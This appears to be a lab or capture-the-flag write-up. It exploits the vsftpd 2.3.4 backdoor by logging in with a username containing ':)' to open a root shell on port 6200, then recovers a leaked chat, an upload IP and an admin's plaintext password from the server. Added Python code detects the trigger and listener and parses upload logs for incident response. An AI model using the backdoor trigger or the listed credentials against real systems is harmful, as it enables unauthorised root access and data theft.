a. Service scanning
An initial scan revealed an FTP service running on port 21 using an outdated and vulnerable version, vsftpd 2.3.4.
Command used:
nmap -sV <ip>
b. Triggering the backdoor
The vsftpd 2.3.4 software contains a well-known malicious backdoor built into its source code. Sending a username that ends with a smiley face :) triggers the daemon to open a hidden listener on port 6200.
*Terminal #1 (triggering FTP)
ftp <ip> 21
#Name: user:)
#Password: Enter

*Note: The connection hangs on purpose, meaning the backdoor successfully spawned in the background.
c. Catching the shell via Netcat: gaining root access.
Using Netcat to connect directly to the newly opened backdoor port:
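From the defender's side, the behaviour described in this step leaves two observable traces: the vulnerable banner and USER command on the FTP control channel, and a new listener on port 6200 on the host. The following added example (written for this page, not code from the lab or from vsftpd) scans a constructed control-channel transcript for both indicators and checks constructed ss -ltn output for the listener. The trigger check matches ":)" anywhere in the USER argument, which covers the "ends with a smiley" case above; the transcript and ss output are constructed samples, not captures from the target.

```python
import re
from dataclasses import dataclass
from typing import List, Set

# Constructed FTP control-channel transcript (not captured from the lab host):
# lines the server sent start with "<", lines the client sent start with ">".
SAMPLE_SESSION = """\
< 220 (vsFTPd 2.3.4)
> USER user:)
> PASS x
> USER alice
> PASS Secret1
> QUIT
"""

# Constructed `ss -ltn` output from the FTP host after the backdoor spawned.
SAMPLE_SS = """\
State   Recv-Q  Send-Q  Local Address:Port  Peer Address:Port
LISTEN  0       32      0.0.0.0:21          0.0.0.0:*
LISTEN  0       128     127.0.0.1:3306      0.0.0.0:*
LISTEN  0       1       0.0.0.0:6200        0.0.0.0:*
"""

BACKDOOR_PORT = 6200
VULNERABLE_BANNER = re.compile(r"\(vsFTPd 2\.3\.4\)")
# The trigger is the byte pair ":)" inside the USER argument, so match it anywhere
# in the name rather than only at the end.
USER_WITH_SMILEY = re.compile(r"^USER\s+(\S*:\)\S*)\s*$")


@dataclass
class Finding:
    line_no: int
    kind: str      # "vulnerable_banner" or "backdoor_trigger"
    detail: str


def scan_ftp_session(transcript: str) -> List[Finding]:
    """Flag a vulnerable server banner and any USER command carrying the trigger."""
    findings: List[Finding] = []
    for line_no, raw in enumerate(transcript.splitlines(), 1):
        if len(raw) < 2 or raw[0] not in "<>":
            continue            # not a transcript line we understand
        direction, payload = raw[0], raw[2:]
        if direction == "<" and VULNERABLE_BANNER.search(payload):
            findings.append(Finding(line_no, "vulnerable_banner", payload.strip()))
        elif direction == ">":
            m = USER_WITH_SMILEY.match(payload)
            if m:
                findings.append(Finding(line_no, "backdoor_trigger", m.group(1)))
    return findings


def listening_ports(ss_output: str) -> Set[int]:
    """Parse the Local Address:Port column of `ss -ltn` into a set of TCP ports."""
    ports: Set[int] = set()
    for line in ss_output.splitlines()[1:]:     # skip the header row
        cols = line.split()
        if len(cols) < 4 or cols[0] != "LISTEN":
            continue
        _, _, port = cols[3].rpartition(":")    # handles IPv6 "[::]:21" as well
        if port.isdigit():
            ports.add(int(port))
    return ports


def backdoor_listener_present(ss_output: str) -> bool:
    """True when the host has something listening on the backdoor port."""
    return BACKDOOR_PORT in listening_ports(ss_output)


if __name__ == "__main__":
    for f in scan_ftp_session(SAMPLE_SESSION):
        print(f"line {f.line_no}: {f.kind}: {f.detail}")
    print("backdoor listener on host:", backdoor_listener_present(SAMPLE_SS))
```

The session scanner is the kind of rule a network sensor would carry; the ss check is what an incident responder runs on the box itself, and a hit on 6200 with no legitimate service bound there is the confirmation that the trigger succeeded.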

Phase #2: Digital forensics and data recovery
a. Analysing leaked chats. I navigated to the /root directory, which revealed a file named "WhatsappChat.txt",

Robert extracted data from the server. They discussed selling Nexcorp's data to a secure buyer.
- Leaked attacker IBAN: DE89370400440532013000

b. Identifying the attacker's IP address
To find where the data was uploaded from, the system logs were reviewed. A custom upload log file was located at /var/log/uploads.log.

Key log output: [2024–08–01 09:15:32] 198.51.100.5 | nexcorp.sql
The file nexcorp.sql represents the entire compromised corporate database. It was uploaded from the IP address 198.51.100.5.
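Reading one line by eye works for a single entry, but a responder usually has to answer "which source IPs uploaded what, and which of those files are sensitive" across the whole log. The following added example (written for this page, not a tool from the lab) parses the [timestamp] ip | filename format shown above, tolerates the en dashes that copy-paste or extraction tends to put into the date, rejects lines whose IP field is not a valid address, and groups uploads by source. The log lines are constructed; only the first one is the entry quoted in the write-up.

```python
import ipaddress
import re
from collections import defaultdict
from datetime import datetime
from typing import Dict, Iterable, List, NamedTuple, Optional

# Constructed sample of /var/log/uploads.log. The first line reproduces the entry
# quoted in the write-up (with the en dashes as they appear on the page); the rest
# are made up to exercise the parser, including a junk line and a bogus IP.
SAMPLE_LOG = "\n".join([
    "[2024\u201308\u201301 09:15:32] 198.51.100.5 | nexcorp.sql",
    "[2024-08-01 09:16:07] 198.51.100.5 | nexcorp.bak",
    "[2024-08-01 10:02:44] 203.0.113.9 | report.pdf",
    "this line is garbage and must be skipped",
    "[2024-08-02 11:30:00] 999.1.1.1 | bogus.sql",
])

# Smart-punctuation dashes that may have replaced the hyphens in the date field.
DASHES = str.maketrans({"\u2013": "-", "\u2014": "-"})
LINE_RE = re.compile(
    r"^\[(\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})\]\s+(\S+)\s*\|\s*(\S+)\s*$"
)
# File extensions that indicate a database dump or backup left the host.
SENSITIVE_EXT = (".sql", ".bak", ".db", ".dump")


class Upload(NamedTuple):
    when: datetime
    source_ip: str
    filename: str


def parse_line(line: str) -> Optional[Upload]:
    """Parse one log line; return None for junk lines or invalid IP fields."""
    m = LINE_RE.match(line.translate(DASHES))
    if not m:
        return None
    ts, ip, name = m.groups()
    try:
        ipaddress.ip_address(ip)        # rejects values like 999.1.1.1
    except ValueError:
        return None
    return Upload(datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"), ip, name)


def parse_log(text: str) -> List[Upload]:
    return [u for u in map(parse_line, text.splitlines()) if u is not None]


def sensitive_uploads(uploads: Iterable[Upload]) -> List[Upload]:
    """Uploads whose filename looks like a database dump or backup."""
    return [u for u in uploads if u.filename.lower().endswith(SENSITIVE_EXT)]


def uploads_by_source(uploads: Iterable[Upload]) -> Dict[str, List[str]]:
    """Map each source IP to the filenames it uploaded, in log order."""
    by_ip: Dict[str, List[str]] = defaultdict(list)
    for u in uploads:
        by_ip[u.source_ip].append(u.filename)
    return dict(by_ip)


def source_of(uploads: Iterable[Upload], filename: str) -> Optional[str]:
    """The source IP recorded for a given filename, or None if never uploaded."""
    for u in uploads:
        if u.filename == filename:
            return u.source_ip
    return None


if __name__ == "__main__":
    ups = parse_log(SAMPLE_LOG)
    for ip, names in uploads_by_source(ups).items():
        print(ip, "->", ", ".join(names))
    print("nexcorp.sql came from:", source_of(ups, "nexcorp.sql"))
```

Validating the IP field and skipping unparseable lines matters in practice: a custom log like this one has no guarantee of a fixed format, and an attacker who can write to it can plant lines meant to mislead the investigation.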
c. Extracting the leaked admin password
The leaked SQL file was located on the server at /etc/uploads/nexcorp.sql
cat /etc/uploads/nexcorp.sql

The user holding the admin role is Alice Green. Her plaintext password leaked in the dump is AdminPass1234!.